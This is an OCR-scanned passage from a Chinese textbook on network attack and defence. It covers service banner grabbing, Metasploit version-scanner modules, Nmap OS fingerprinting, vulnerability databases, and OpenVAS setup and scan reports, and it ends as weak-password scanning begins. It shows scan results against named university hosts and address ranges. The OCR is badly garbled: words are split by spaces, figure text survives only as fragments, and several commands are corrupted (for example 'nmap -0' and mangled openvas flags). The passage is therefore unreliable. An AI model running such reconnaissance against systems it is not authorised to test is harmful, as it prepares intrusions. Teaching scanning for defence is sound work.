鉴于 端口 扫描 是 网 络 攻击 的 前 奏 , 尽 早 发 现 扫描 行为 对 于 预防 攻击 者 成 功 实 施 攻击 
有 着 极 要 的 意义 。 安 全 管理 员 应 该 采取 的 防御 措施 主要 包括 : 

(1) 关闭 没有 使 用 的 端口 和 具有 潜在 危险 的 端口 。 

(2) 应 用 防火 墙 ,使 得 只 有 符合 安全 策略 的 报 文通 过 。 

(3) 使 用 入 侵 防御 工具 ,实时 或 定期 检测 端口 状态 ,如果 在 某 个 值 时 间 内 发 现 某 类 
报 文 超过 预先 设 定 的 阅 值 ,那么 可 认为 正在 受到 扫描 ,可 以 拒绝 该 类 报 文 的 源 IP 地 址 继 
续 发 送 同 类 报 文 ,从 而 阻止 对 方 的 扫描 过 程 。 


4.2 类 型 和 版 本 扫描 


在 端口 扫描 完成 后 ,已 经 得 到 关于 端口 上 开放 哪些 服务 的 简单 信息 ,但 是 这 些 信息 并 
不 完全 准确 ,仅仅 是 将 各 个 端口 匹配 常见 的 公开 服务 而 已 。 要 想 获得 更 加 详细 的 有 关 端 
口上 运行 的 服务 的 版 本 和 类 型 信息 ,就 需要 进行 服务 扫描 ,也 称 为 服务 查 点 。 


4.2.1 服务 扫描 


服务 扫描 与 端口 扫描 的 区 别 在 于 针对 性 和 目的 性 不 同 , 端 口 扫描 常常 在 一 个 较 大 范 
围 内 寻找 可 攻击 的 目标 主机 或 服务 ; 而 服务 扫描 是 在 已 经 选择 好 目标 的 情况 下 ,有 针对 
性 地 收集 具体 的 服务 信息 。 其 基本 原理 是 针对 不 同 服务 使 用 的 协议 类 型 ,发送 相 应 的 应 
用 层 协议 探测 报 文 ,检测 返回 报 文 的 信息 ,从 而 可 以 判断 目标 服务 类 型 或 其 他 有 用 信息 。 

主要 方法 包括 利用 专用 客户 端 工 具 或 者 利用 专用 服务 扫描 工具 收集 服务 信息 。 

1. 利用 客户 端 工具 

利用 客户 端 连接 至 远程 网 络 服务 并 观察 输入 和 收集 关键 信息 ,通常 只 对 明文 传输 的 
网 络 服务 有 效 。 例 如 

(1) telnet 工具 : 可 以 访问 HTTP、FTP、TELNET、SMTP、POP3 等 TCP 服务 端口 ， 
通过 服务 程序 发 来 的 旗 标 (banner) 信 息 ,可 以 大 致 推断 服务 的 版 本 和 类 型 。 如 图 4-13 所 
示 , 测 试 mail. jxnu. edu. cn 的 SMTP 和 POP3 的 服务 程序 版 本 号 ,可 以 发 现 是 亿 邮 
(eYou) 电 子 邮件 系统 。 











图 4-13 telnet 工具 收集 服务 信息 














(2) rpcinfo 工具 : 用 于 收集 目标 RPC( 远 程 过 程 调用 ) 服 务 的 信息 ,如 图 4-14 所 示 。 
(3) net view/use 和 nbtstat 命令 : 收集 Windows 主机 的 域 信息 和 共享 信息 等 ,如 
图 4-15 所 示 。 
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Seangyangynet view /donain 


yangynet view /donain:Workgroup 

)000 
160000 
160069 
160069 





图 4-14 ”rpcinfo 示例 图 4-15 ”net view 使 用 示例 


(4) Sysinternals 中 的 工具 如 PsInfo、PsService 可 以 收集 远程 主机 的 很 多 有 用 信息 ， 
如 图 4-16 所 示 。 








(b) 


图 4-16 psinfo 和 psservice 使 用 示例 


2. 利用 自动 工具 大 范围 扫描 






Metasploit 平台 中 的 Scanner 辅助 模块 集成 了 许多 用 于 服务 扫描 的 自动 工具 ,这 些 
工具 通常 以 [service_name]_version 命名 ,可 用 于 遍历 网 络 中 包含 某 种 服务 的 目标 主机 ， 


例如 : 

(1) http_version 模块 : 查找 网 络 中 的 Web 服务 器 ,并 确定 服务 器 的 版 本 号 ,图 4-17(a) 
列 出 了 网 站 “www. jxnu. edu. cn” 的 Web 服务 器 版 本 是 “Apach/2. 2. 8”, 而 且 是 一 台 
UNIX 服务 器 。 





(a) (b) 


图 4-17 Metasploit 平 台 下 的 http_version 和 ssh_version 模块 示例 


(2) ssh_version 模块 : 查找 网 络 中 的 SSH 服务 器 ,并 确定 其 版 本 号 ,图 4-17(b) 列 出 了 
查找 网 段 “202. 101. 194.0/24” 的 所 有 SSH 服务 及 版 本 信息 ,可 以 看 出 主机 “202. 101. 194. 9” 
开启 了 SSH 服务 ,服务 程序 是 “SSH-2. 0-dropbear”。 

(3) tnslsnr_version 模块 : 查找 网 络 中 的 Oracle 监听 器 服务 ,发 现 开 发 的 数据 库 并 
确定 版 本 号 。 

(4) open_proxy 模块 : 寻找 免费 开放 的 代理 服务 。 

端口 扫描 工具 Nmap 及 其 图 形 接口 Zenmap 均 支 持 服 务 扫描 (-sV 选项 ) ,图 4-18 列 
出 了 扫描 网 段 *202. 101. 194. 0/24? 的 SSH 服务 的 部 分 结果 ,与 图 4-17(b) 类 似 ,发 现 了 主 
机 “202. 101. 194. 9” 开 启 了 SSH 服务 ,但 是 Nmap 返回 的 信息 更 加 详细 。 


ata.com.cn (262. 





图 4-18 Nmap 的 服务 扫描 示例 


4.2.2 操作 系统 扫描 


操作 系统 扫描 是 一 种 可 以 探测 目标 操作 系统 类 型 的 扫描 技术 ,也 称 为 协议 栈 指纹 识 
别 (TCP Stack Fingerprinting)。 虽 然 TCP 协议 有 RFC 标准 ,但 是 各 个 操作 实现 的 
协议 栈 细节 并 不 相同 ,有 的 对 规范 的 理解 不 同 , 有 的 没有 严格 执行 规范 ,有 的 实现 了 一 些 
可 选 特性 ,还 有 的 对 IP 协议 做 了 改进 。 如 果 对 目标 发 出 一 系列 探测 报 文 ,由 于 每 种 操作 
系统 对 各 个 探测 包 都 有 其 独特 的 响应 方式 ,所 以 根据 返回 的 响应 报 文 即 可 以 确定 目标 运 
行 的 操作 系统 类 型 。 常 用 的 指纹 包括 FIN 探测 .TCP ISN、TCP 窗口 .DF 标志 、TOS 域 、 
IP 碎片 和 TCP 选项 等 。 

FIN 探测 指 不 同 的 系统 对 收 到 的 FIN 标记 报 文 有 不 同 的 响应 。RFC973 规定 一 个 开 
放 的 端口 在 收 到 带 有 FIN 标记 的 报 文 ,不 会 有 任何 响应 ,但 是 很 多 系统 如 Windows、 
Cisco 和 HP UNIX 等 会 响应 一 个 带 有 RST 标记 的 报 文 ,这 个 探测 报 文 就 可 以 用 来 区 分 

这 些 系 统 。 大 部 分 操作 系统 扫描 器 都 使 用 了 这 个 探测 报 文 。 

TCP ISN 是 TCP 连接 的 初始 序列 号 ,可 以 分 析 目 标 对 连接 请 求 的 响应 来 判定 其 ISN 
的 特征 ,根据 ISN 的 变化 规律 可 以 对 操作 系统 类 型 进行 分 类 : 

(1) 随机 增加 : Solaris、Irix、FreeBSD 等 。 
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或 
为 


(2) 随机 变化 : Linux、AIX 等 。 

(3) 基于 时 间 的 变化 : Windows。 

(4) 固定 不 变 : 某 些 打印 设备 或 交换 设备 。 

很 多 系统 会 在 IP 报 文 头 部 设置 DF 标志 位 , 即 表示 “不 分 片 ”; 但 并 不 是 所 有 系统 都 
是 使 用 这 个 设置 ,所 以 该 标志 位 也 可 以 用 来 区 分 不 同系 统 。 有 些 系统 返回 RST 报 文 时 
使 用 比较 特殊 的 窗口 值 ,例如 早期 Windows 2000 的 TCP 堆栈 ,返回 RST 报 文 时 窗口 
总 是 0x402E。 

不 同系 统 对 有 ACK 标记 报 文 的 处 理 也 有 所 不 同 , 例 如 向 一 个 关闭 的 端口 发 送 URG 
PSH 标记 的 报 文 ,有 的 系统 会 把 确认 的 序号 值 设 置 为 ISN, 有 的 会 把 确认 的 序号 设置 
收 到 报 文 的 序号 加 1 。 

有 些 系统 根据 RFC1812 的 建议 对 某 些 类 型 的 错误 信息 发 送 频率 做 了 限制 ,如 Linux 
核 限 制 ICMP 目标 不 可 达 报 文 的 发 送 速 每 秒 一 次 ,那么 可 以 通过 UDP 扫描 发 送 
大 量 报 文 , 检 测 收 到 的 不 可 达 报 文 个 数 来 判断 系统 类 型 。 另 外 ,还 可 以 根据 ICMP 错误 报 




















文 的 大 小 和 类 型 来 判断 。 


行 


检测 TCP 报 文 的 选项 是 最 有 效 的 识别 方法 之 一 ,因为 : 

(1) TCP 选项 是 可 选 的 ,不 是 所 有 系统 都 使 用 TCP 选项 。 

(2) 向 目标 发 送 带 有 可 选项 标记 的 报 文 时 ,如 果 目 标 系 统 支 持 该 选项 ,返回 的 报 文中 
会 设置 同样 的 选项 。 

(3) 在 一 个 报 文中 设置 多 个 选项 ,可 以 增加 检测 的 准确 度 ， 

(4) 如 果 不 同 系统 支持 相同 的 选项 ,还 可 以 通过 返回 的 选项 值 和 选项 的 排列 顺序 进 
区 分 。 


几乎 所 有 的 端口 扫描 工具 都 支持 操作 系统 扫描 ,Nmap 6. 49 中 收集 了 2600 多 个 操作 系 





统 指纹 ,存放 在 名 为 “nmap-os-db” 的 文本 文件 中 ,图 4-19 给 出 Windows 7 Professional 系 
统 的 一 个 指纹 示例 。 





Fingerprint MM 


IE(DFI 





图 4-19 Windows 7 Professional 系统 的 操作 系统 指纹 


指纹 ?的 首 行 表示 操作 系统 的 类 型 ,Nmap 发 送 6 个 SYN 探测 报 文 ,用 于 检测 目标 协 


中 ”指纹 格式 : https://nmap. org/book/osdetect-methods. html# osdetect-probes-t 
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议 栈 的 序号 (SEQ) 产 生 方式 、 选 项 (OPS) 使 用 方式 、 窗 口 (WIN) 使 用 方式 和 第 一 个 应 答 报 
文 (T1) 的 各 个 字段 。 发 送 一 个 SYN 报 文 检测 目标 是 否 支 持 显示 拥塞 通知 (ECN) ,T2 一 
T7 表示 发 送 6 个 TCP 探测 报 文 并 检测 应 答 报 文 的 各 个 字段 ; Ul 表示 发 送 一 个 固定 参 
数 的 UDP 报 文 后 ,检测 应 答 报 文 的 各 个 字段 ; IE 表示 发 送 两 个 固定 参数 的 ICMP 报 文 
后 ,检测 应 答 报 文 的 各 个 字段 。 下 面 详细 列 出 了 各 个 字段 的 基本 含义 : 

(1) SEQ 检测 : SP( 序 号 预测 ) 检 测报 文 初始 序号 (ISN) 的 可 预测 性 (variability); 
GCD 检测 各 个 报 文 ISN 的 最 大 公约 数 ; ISR 检测 ISN 的 平均 增长 速率 ; TI/CI/II 对 应 
三 种 检测 ID 号 的 生成 算法 ,其 中 工 表示 incremental, 每 次 增加 ID 不 超过 10; SS 检测 
TCP 报 文 是 否 和 ICMP 报 文 共享 ID 号 ,S 表示 共享 ; TS 检测 响应 报 文 的 时 间 戳 选项 算 
法 ,7 表示 每 个 响应 的 时 间 递 增 范围 在 70 一 150ms。 

(2) OPS 检测 : O1 一 06 表示 6 个 报 文 的 选项 设置 ; M 表示 MSS 值 ,M5B4 表示 
MSS 大 小 为 1460 字 节 ; N 表示 NOP( 无 操作 ) 选 项 ,NOP 选项 可 以 有 多 个 ; W8 表示 
“Window Scale” 选 项 值 为 8; S 表示 设置 了 选择 确认 选项 ; T 表示 时 间 戳 选项 ,后 面 的 两 
个 数字 分 别 表 示 时 间 戳 字段 和 时 间 戳 回 送 回答 字段 是 否 设置 ,11 表示 两 个 字段 都 设置 ， 
00 表示 两 个 字段 都 没有 设置 。 

(3) WIN 检测 : W1 一 W6 用 于 检测 收 到 的 6 个 应 答 报 文 的 初始 窗口 值 。 

(4) Tl 检测; 对 第 1 个 报 文 的 应 答 报 文 进行 检测 ; R=Y/N 表示 是 否 收 到 应 答 ; DF 
三 Y/N 表示 DF 标记 是 否 设置 ; T 表示 应 答 报 文 的 TTL 值 的 范围 ,7B-85 指 123 一 133; 
TG 表示 Nmap 没有 收 到 应 答 时 对 TTL 字段 的 猜测 值 ,80 表示 猜测 TTL 为 128; W 表 
示 S 检测 序号 值 ,Z 表示 序号 为 0,O 表示 序号 既 不 是 0, 与 确认 序号 也 没有 关系 ; A 表示 
检测 确认 序号 ,S 十 指 确认 号 等 于 序号 加 1; FF 检测 TCP 标记 是 否 都 设置 ,AS 表示 SYN 
和 ACK 标记 已 设置 ; O 检测 即 OPS 检测 ; RD 检测 RST 标记 的 报 文 是 否 撒 带 数 据 , 如 
果 有 就 执行 一 次 CRC32 校 验 并 计算 结果 ,没有 则 RD 设 为 0; Q 检测 一 些 少见 的 行为 ,有 
L 和 RR 两 个 值 ,如 果 第 一 个 保留 位 设置 了 ,那么 字符 R 会 被 记录 在 Q 值 中 ,如 果 没 有 设置 
URG 标记 ,但 是 URG 字段 的 值 不 为 0, 那么 工会 被 记录 在 Q 值 中 ; 如 果 两 种 情况 都 没 
有 , 则 Q 值 是 空 串 。 

(5) ECN 检测 : Nmap 发 送 一 个 定制 的 检测 拥塞 通知 的 报 文 ,CC 检测 应 答 报 文 中 
CWR 和 ECE 标记 位 的 值 ,CWR 和 ECE 是 TCP 报 文中 6 位 保留 位 的 后 2 位 ,用 于 指示 
主机 是 否 支 持 显 式 拥塞 通知 ; 其 他 检测 方式 与 T1 检测 相同 。 

(6) T2~~T7 检测 : 发 送 6 个 固定 参数 的 TCP 报 文 , 检 测 它 们 的 应 答 报 文 ,检测 方式 
与 T1 检测 相同 。 

(7) Ul 检测 : 检测 UDP 应 答 报 文 的 各 个 字段 值 ,除了 包含 Tl 检测 中 有 关 IP 头 部 
的 参数 外 , 它 还 支持 其 他 一 些 检 测 方 式 ; IPL 检测 应 答 报 文 的 总 长 度 并 记录 ,八进制 数 
164 表示 116 字 节 长 ; UN 检测 返回 的 ICMP 端口 不 可 达 报 文中 的 没有 使 用 的 4 个 字 节 
是 否 设置 为 0,UN 记录 这 4 个 字 节 的 值 ; 当 应 答 报 文 是 ICMP 端口 不 可 达 时 ,有 的 系统 
实现 不 会 把 原始 的 IP 报 文 完 整 包 含 ,RIPL 值 就 记录 实际 收 到 的 IP 应 答 报 文 长 度 ,否则 
值 设置 为 G, 表 示 包 含 了 完整 的 原始 IP 报 文 ; RID 记录 应 答 报 文中 原始 IP 报 文 的 ID 号 
是 否 被 修改 ,如 果 没 有 被 修改 则 设置 为 G, 和 否则 记录 实际 的 ID 号 ; RIPCK 检测 原始 IP 报 





网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





文 的 校 验 和 是 否 匹 配 应 答 报 文中 包含 的 原始 IP 报 文 ,如 果 匹 配 则 设置 为 G, 如 果 该 字段 
为 0 则 设置 为 Z, 否 则 设置 为 I; RUCK 检测 原始 IP 报 文 的 UDP 包头 校 验 和 是 否 被 修 
改 , 没 有 修改 则 设置 为 G, 否 则 设置 为 修改 的 值 ; RUD 检测 收 到 的 应 答 报 文 的 完整 性 ,如 
果 收 到 报 文 的 数据 都 是 字符 “C? 或 者 报 文 数据 长 度 为 0, 则 设置 为 G, 和 否则 设置 为 I。 

(8) IE 检测: 检测 ICMP 应 答 报 文 的 各 个 字段 值 , 除 了 包含 T1 检测 中 有 关 IP 头 痢 
的 参数 外 , 它 还 支持 其 他 一 些 检测 方式 ; CD 检测 应 答 报 文 的 代码 字段 是 否 为 0,Z 表示 两 
个 应 答 报 文 的 代码 字段 都 为 0; DFI 测试 两 个 应 答 报 文 的 DF 标记 设置 情况 ,N 表示 两 个 
应 答 都 没有 设置 DF 标记 。 

Nmap 扫描 目标 的 操作 系统 类 型 结果 如 图 4-20 所 示 , 图 4-20(a) 中 较为 准确 地 发 现 
主机 “192. 168. 2. 102” 运 行 的 是 Windows 7 或 8 系统 。Nmap 必须 至 少 要 发 现 一 个 开放 
和 关闭 端口 才 有 可 能 准确 判断 操作 系统 类 型 ,否则 只 能 尽量 猜测 ,如 图 4-20(b) 所 示 。 
Nmap 扫描 远程 操作 系统 的 命令 如 下 : 





nmap -0 [ --osscant- limit] [ -- osscan- guess] 远 程 主机 





图 4-20 Nmap 的 操作 系统 扫描 示例 
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4.3 漏洞 扫描 


漏洞 是 指 计 算 机 或 网 络 系统 具有 某 种 可 能 被 攻击 者 恶意 利用 的 特性 ,又 被 称 作 脆弱 
性 Cvulnerability) 。 漏 洞 扫描 是 针对 特定 应 用 和 服务 查找 目标 网 络 中 存在 哪些 漏洞 ,它们 
是 成 功 实施 攻击 的 关键 所 在 。 根 据 漏洞 的 属性 和 利用 方法 ,漏洞 分 为 操作 系统 漏洞 ,应 用 
服务 漏洞 和 配置 漏洞 等 。 操 作 系 统 漏 洞 按照 不 同系 统 分 类 ,如 Windows、 Linux、MAC 
OS 各 类 UNIX 系统 等 ; 应 用 服务 漏洞 按照 具体 的 服务 类 型 ,服务 程序 名 和 版 本 号 分 类 ; 
配置 漏洞 按照 系统 类 型 程序 名 称 和 设置 选项 分 类 。 网 络 安全 管理 员 需 要 定期 对 管理 的 
网 络 或 设备 进行 漏洞 扫描 ,提升 网 络 安全 性 。 

漏洞 扫描 主要 采取 两 种 方法 : 

(1) 根据 端口 和 服务 扫描 的 结果 ,与 已 知 漏洞 数据 库 进 行 匹配 ,检测 是 否 有 满足 匹配 
的 漏洞 存在 。 

(2) 根据 已 知 漏洞 存在 的 原因 设置 必要 的 检测 条 件 ,对 目标 进行 “ 浅 层次 ”的 攻击 测 
试 ,以 判断 漏洞 是 否 存 在 ,如 存在 则 报告 漏洞 的 详细 信息 。 所 谓 “ 浅 层次 ”攻击 是 指 并 不 实 
际 攻击 系统 ,而 是 仅 依据 漏洞 的 特征 进行 测试 ,以 判断 漏洞 存在 的 可 能 性 ,所 以 扫描 器 的 
报告 信息 有 时 未 必 十 分 准确 。 

漏洞 扫描 技术 包括 基于 漏洞 数据 库 和 基于 插件 两 种 。 


4.3.1 基于 漏洞 数据 库 


安全 专家 根据 系统 安全 漏洞 实例 .攻击 案例 的 分 析 、 管 理 员 配 置 网 络 的 经 验 , 形 成 一 
套 标 准 的 漏洞 数据 库 , 在 此 基础 上 构建 相应 的 匹配 规则 ,由 扫描 程序 自动 进行 扫描 。 漏 洞 
数据 库 信息 的 完整 性 和 有 效 性 决定 了 扫描 器 的 性 能 ,数据 库 的 更 新 和 修订 会 影响 扫描 的 
运行 时 间 。 

互联 网 上 的 主要 漏洞 数据 库 平台 包括 : 

(1) 乌云 : http://www. wooyun. org 

(2) 知道 创 宇 : http://www. seebug. org 

(3) 国家 信息 安全 漏洞 共享 平台 : http://www. cnvd. org. cn/ 

(4) CVE 漏洞 平台 : http://www. cve. mitre. org/cve/cve. html 

(5) 安全 焦点 : http://www. securityfocus. com/vulnerabilities 

(6) 报 文风 暴 安全 : https://packetstormsecurity. com/ 

(7) 美国 国家 漏洞 数据 库 (NVD) : https://nvd. nist. gov/ 

漏洞 数据 库 中 的 漏洞 信息 通常 包括 简要 描述 .具体 描述 .危害 和 影响 .解决 方 案 、 受 影 
响 的 系统 或 服务 版 本 ,以 及 该 漏洞 在 其 他 漏洞 数据 库 中 的 索引 。 图 4-21 给 出 了 在 NVD 
中 的 两 个 漏洞 例子 ,图 4-21 (a) 是 Windows 操作 系统 漏洞 ,图 4-21(b) 是 Internet 
Explorer 8 浏览 器 程序 的 漏洞 。Overview 节 简 单 叙 述 了 该 漏洞 的 原因 和 结果 ， 
Description 节 详 细 叙 述 了 该 漏洞 的 产生 原因 ,Impact 节 说 明了 该 漏洞 的 利用 方法 和 危 
害 ,Solution 节 给 出 解决 方案 ,Vendor Information 指明 了 哪些 系统 存在 该 漏洞 。 
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图 4-21 NVD 漏洞 数据 库 示 例 


4.3.2 基于 插件 


插件 是 由 脚本 语言 编写 的 子 程 序 模块 ,可 以 调用 插件 来 执行 漏洞 扫描 。 随 时 添加 新 
的 功能 插件 就 可 以 使 扫描 软件 增加 新 的 功能 ,升级 插件 即 可 更 新 漏洞 的 特征 信息 ,从 而 得 
到 更 加 准确 的 扫描 结果 。 插 件 技术 使 得 扫描 软件 的 升级 维护 变 得 十 分 简单 ,使 用 专用 脚 
本 开发 插件 使 得 扫描 软件 具备 很 强 的 扩展 性 。 

目前 , 绝 大 多 数 扫描 软件 都 结合 了 这 两 种 技术 实现 ,但 是 它们 都 存在 不 足 之 处 。 因 为 
扫描 的 关键 在 于 漏洞 描述 和 匹配 规则 的 准确 性 ,如 果 规 则 设置 得 不 准确 ,目标 即使 有 相应 
漏洞 也 不 会 产生 匹配 ; 如 果 规 则 更 新 得 不 及 时 ,准确 度 也 会 逐渐 降低 。 只 有 不 断 地 扩充 
和 修改 漏洞 数据 库 和 匹配 规则 ,才能 得 到 更 精确 的 结果 。 

经 典 漏洞 扫描 软件 包括 : 

(1) Shadow Security Scanner: 来 自 俄罗斯 的 扫描 工具 ,速度 最 快 ,功能 非常 强大 ,是 
唯一 可 以 检测 出 思科 、 惠 普及 其 他 网 络 设备 错误 的 商业 软件 。 

(2) Nessus: 全 世界 使 用 最 多 的 系统 漏洞 扫描 与 分 析 软 件 , 总 共有 超过 75 000 个 机 
构 使 用 Nessus 作为 安全 检测 工具 ; 采用 C/S 结构 ,客户 端 提供 图 形 界面 ,接受 用 户 的 命 
令 与 服务 器 通信 ,传送 用 户 的 扫描 请 求 给 服务 器 端 , 由 服务 器 启动 扫描 并 将 扫描 结果 呈现 
给 用 户 ; 扫描 代码 与 漏洞 数据 相互 独立 ,针对 每 一 个 漏洞 有 一 个 对 应 的 插件 ,插件 是 用 
NASL(NESSUS Attack Scripting Language) 编写 的 一 小 段 模拟 攻击 漏洞 的 代码 ; 现在 
已 经 转 为 商业 软件 。 

(3) X-Scan: 国内 出 品 的 著名 漏洞 扫描 器 ,架构 与 Nessus 类 似 , 集 成 了 较 多 早期 的 
漏洞 插件 ,2005 年 后 已 经 停止 更 新 。 

(4) OpenVAS: 目前 最 好 的 免费 开源 漏洞 扫描 工具 ,实际 是 一 个 开放 式 漏洞 评估 系 
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统 ,只 能 在 Linux 下 运行 。 从 早期 Nessus 的 开源 版 本 中 演变 而 来 ,同样 也 采用 C/S 架 
构 ,漏洞 插件 每 天 都 在 不 断 更 新 ,现在 已 经 有 超过 50 000 个 插件 。4. 3. 3 节 以 OpenVAS 
为 例 说 明 漏 洞 扫描 工具 的 基本 使 用 方法 。 


4.3.3 OpenVAS 


图 4-22 给 出 了 OpenVAS 的 基本 架构 , 它 包 含 了 几 个 服务 和 工具 ,例如 扫描 服务 和 
管理 服务 ,各 个 组 件 之 间 的 通信 使 用 OTP (OpenVAS Transfer Protocol) 和 OMP 
(OpenVAS Manager Protocol) 。 
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图 4-22 OpenVAS 体系 结构 


(1) OpenVAS Scanner: 最 核心 的 组 件 。Scanner 根据 从 “NVT Feed Service” 得 到 
的 最 新 NVT 数据 库 对 目标 执行 高 效 的 漏洞 扫描 , 它 以 服务 形式 提供 并 在 TCP 9391 端口 
监听 ,等 待 用 户 的 扫描 请 求 。 

(2) NVT(Network Vulnerability Test, 网 络 漏洞 测试 ) 脚 本 : OpenVAS 可 以 对 多 种 
远程 系统 (Windows、Linux、UNIX 以 及 Web 应 用 程序 等 ) 的 安全 问题 进行 检测 , 它 维护 
了 一 套 免 费 的 NVT 库 , 并 定期 更 新 ,以 保证 检测 出 最 新 的 系统 漏洞 。 

(3) OpenVAS Manager: OpenVAS 的 中 心 管理 器 , 它 的 功能 包括 : 四 负责 分 配 和 管 
理 扫描 任务 ; @ 读 写 和 保存 所 有 扫描 配置 选项 ; @ 保 存 所 有 扫描 结果 ; @ 实 现 基于 用 户 
组 和 角色 的 访问 控制 。 

(4) GSA(Greenbone Security Assistant) : 访问 OpenVAS 服务 的 Web 接口 程序 ,用 
户 使 用 GSA 登录 并 使 用 OpenVAS 提供 的 服务 ,用 户 必须 用 浏览 器 从 GSA 提供 的 首页 
登录 。 

(5) OpenVAS CLI: 访问 OpenVAS 的 命令 行 接口 程序 ,可 以 批 处 理 执行 OpenVAS 
的 扫描 和 管理 任务 。 
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在 开始 使 用 OpenVAS 进行 漏洞 扫描 之 前 ,有 不 少 准备 工作 需要 完成 ,主要 包括 : 
@ 生成 执行 OpenVAS 所 需 的 证 书 文件 。 


openvas — mkcert ~q 一 上 // 创 建 服务 器 端 证 书 
openvas ~ mkcert 一 client -mn 一 // 创 建 客户 端 证 书 

@ 升级 到 最 新 的 NVT 库 。 

openvas — nvt — Sync // 与 最 新 的 NVT 数据 同步 

openvas — scapdata — sync //SCaP 数据 库 同步 

openvas — certdata — sync // 验 证 数据 同步 

@ 初始 化 扫描 引擎 9 。 

openvassd // 初 始 化 扫描 服务 

openvasmd 一 一 migrate // 重 建 管理 数据 库 

openvasmd —— rebuild // 更 新 NVT 缓存 为 最 新 的 NVT 数据 库 


@ 创建 OpenVAS 的 管理 员 用 户 。 


openvasmd 一 -create 一 user = 用 户 名 [ -- role= Admin] // 创 建 用 户 名 ,默认 角色 是 管理 员 
openvasmd -- new- password= 明文 口令 --user= 用 户 名 // 为 用 户 设置 密码 


加 启动 OpenVAS 扫描 服务 。 
openvassd -- listen= 监听 的 IP 地 址 -- port= 监听 的 端口 号 // 默 认 在 127.0.0.1:9391 开启 服务 


service openvas — scanner start // 调 用 服务 启动 脚本 
@ 启动 OpenVAS 管理 服务 。 


openvasmd -- database = 数据 库 路 径 -- listen= 监听 的 IP 地址 -- port== 监听 的 端口 号 
// 默 认 在 0.0.0.0:9390 开启 服务 ,数据 库 路 径 默认 为 /var/1ib/openvas/mgr/tasks. db 


Service openvas-manager start 


完成 准备 工作 后 , 即 可 以 配置 CLI 或 者 GSA 来 执行 OpenVAS 的 管理 和 扫描 任务 


了 。 以 下 以 GSA 为 例 说 明 OpenVAS 的 使 用 方法 和 效果 ,有 以 下 两 种 方法 可 以 启 
动 GSA: 


gasd -- listen == 监听 的 IP 地 址 -- port= 监 听 的 端口 号 -- mlisten = 管理 器 IP 地 址 
一 -mport 管理 器 的 端口 


service greenbone - security- assistant start // 默 认 在 0.0.0.0:9393 开启 服务 


@ 如 果 在 执行 openvasmd -rebuild 时 失败 ,通常 是 版 本 不 兼容 的 原因 ,此 时 需要 删除 文件 “/var/lib/openvas/ 


mgr/tasks. db" 后 再 重新 初始 化 扫描 引擎 , 引 自 https://segmentfault. com/q/1010000004072397。 


所 有 上 述 配置 工作 在 KALI Linux 2. 0 版 本 中 被 集成 为 一 个 配置 脚本 “/usr/bin/ 
openvas-setup”, 可 以 直接 执行 该 脚本 完成 配置 工作 。 配 置 完成 后 ,还 需要 检查 配置 是 否 
正确 ,可 以 调用 “/usr/bin/openvas-check-setup” 脚 本 进行 检查 , 当 它 发 现 某 个 配置 不 正确 
时 ,立即 中 断 检查 并 提示 错误 信息 ,如 图 4-23 所 示 , 脚 本 提示 程序 配置 的 服务 器 证 书 无 
效 , 需 要 执行 证 书 配 置 ,并 给 出 了 有 关 设 置 的 命令 。 
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图 4-23 OpenVAS 配置 检查 脚本 


基于 GSA, 执 行 OpenVAS 任务 的 工作 完全 通过 浏览 器 完成 : 四 登录 GSA 服务 
”, 输 入 用 户 名 和 口令 ,进入 主 界面 (图 4-24); @ 使 用 向 导 创 
建 扫描 任务 (图 4-25); @ 启 动 扫 描 任 务 随时 查看 进度 (图 4-26); @ 查 看 报告 中 的 详细 信 
息 (图 4-27) ,每 条 报警 都 标 有 表示 严重 程度 的 分 数 ,10 分 表示 最 严重 。 图 4-28 显示 目标 
主机 存在 两 个 与 SMB 协议 有 关 的 高 危 漏 洞 ,允许 攻击 者 远程 执行 代码 , 单 击 该 漏洞 名 称 
即 可 显示 该 漏洞 的 具体 细节 ,攻击 者 可 根据 漏洞 细节 寻找 有 关 漏 洞 利用 程序 实施 攻击 。 
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图 4-24 登录 画面 和 主 界面 
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any credentials | on port [22 
fyou enter an email address in the (optional} 
“Email report to* field, a report of the SMB Credential 
scan will be sent to this address once {optional) 
Kt isfinished, ESX Credential 
Fnaly you can select a slave which wil (optional) 





run the scan Emailreportto  [ 


When creating the Target and Task! (optional) 
will use the default Port Ust and 
OperVAS Scanner configured in "My 
Settings" 


Slave (optional): 
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wll appear automatically In areas where For this short-cut Iwill do the following for you 


图 4-26 主 界面 显示 已 建立 的 任务 列表 
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图 4-27 显示 报告 列表 
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Filter: [sort-reverse=severity result_hosts_only=1 min_cvss_base= min_qod=7( 








SMBv1 Unspecified Remote Code Execution (Shadow 
Brokers) 


a EOF 0% 1921682100 445tcp 


Cr er rr 


GO mer so% 192168.2100 


DCE services Enumeration Reporting 


SMBvl Unspecified Remote Code Execution (Shadow 
Relative IP ldentfication number change 。 Brokers) 


TCP tmestamps Summary 

The remote Windows host is prone to an unspecified remote code execution vuinerabilty in SMBv protocol, 
os Detection Consolidation and Reporting 
‘Vulnerability Detection Result 


Traceroute ‘Winerabilty was detected according to the Winerabillty Detection Method. 


CpE Inventory 三 
DCE sevkces Enumeration Solution type: 四 workaround 


SMBICIFS Server Detection Disable SMB vl and/or block all versions of SMB at the network boundary by blocking TCP port 445 with related pr 


1373139 and TCP port 139, for all boundary devices. 

SMB NatveLanMan 

‘Vulnerability Insight 
The remote Windows host is supporting SMBvl and is therefore prone to an unspecified remote code execution v 
wulnerabllty Is related to the “Shadow Brokers group. 


SMBIcIFS Server Detection 


SMB Remote Version Detectlon 


Vulnerability Detection Method 
Detalls: SMBV1 Unspecified Remote Code Execution (Shadow Brokers) (OID: 1.3.6.1.4.1.25623.1.0.140151) 


和 Version used: $Revision: 5455 § 


图 4-28 ”扫描 结果 的 详细 报告 和 漏洞 细节 
4.4 弱 口 令 扫 描 


大 部 分 网 络 服务 都 使 用 散 列 算法 进行 口令 的 加 密 , 虽 然 口令 的 散 列 值 具有 单 向 不 可 
逆 的 特性 ,使 得 从 算法 本 身 去 破解 口令 的 散 列 值 十 分 困难 ,但 是 由 于 散 列 算法 是 公开 的 ， 
对 口令 进行 正 向 猜测 就 比较 可 行 。 因 为 许多 用 户 在 选择 口令 时 ,会 习惯 性 地 选用 容易 记 
忆 且 带 有 明显 特征 的 口令 ,攻击 者 可 以 制作 口令 字典 文件 ,其 中 收集 经 常 被 用 作 口 令 的 字 
符 串 。 扫 描 时 ,逐一 使 用 字典 中 的 各 条 字符 串 进行 口令 尝试 ,如 果 返 回 验 证 成 功 的 信息 ， 
